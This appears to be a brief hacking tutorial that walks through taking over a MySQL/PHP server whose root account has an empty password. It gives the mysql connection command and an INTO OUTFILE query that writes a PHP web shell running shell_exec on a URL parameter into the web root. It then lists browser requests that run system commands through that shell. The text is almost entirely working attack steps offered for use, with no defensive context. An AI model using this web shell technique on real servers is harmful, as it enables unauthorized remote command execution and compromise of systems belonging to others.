This is a simple and effective exploitation at a mis-configured MySQL/PHP server.
First, use nmap to discover a mis-configured MySQL where root with empty password.
Secondly, connect to the MySQL with mysql client.
$ mysql -u root -h 192.168.1.33
Then create a PHP backdoor with the following SQL command:
MySQL > select 'Hello World' into outfile '/tmp/test' from mysql.user limit 1;
MySQL > select '<?php $output=shell_exec($_GET["cmd"]);echo "<pre>".$output."</pre>"?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1;
Lastly, start exploiting it from the browser:
http://192.168.1.33/shell.php
http://192.168.1.33/shell.php?cmd=id
http://192.168.1.33/shell.php?cmd=ps -eaf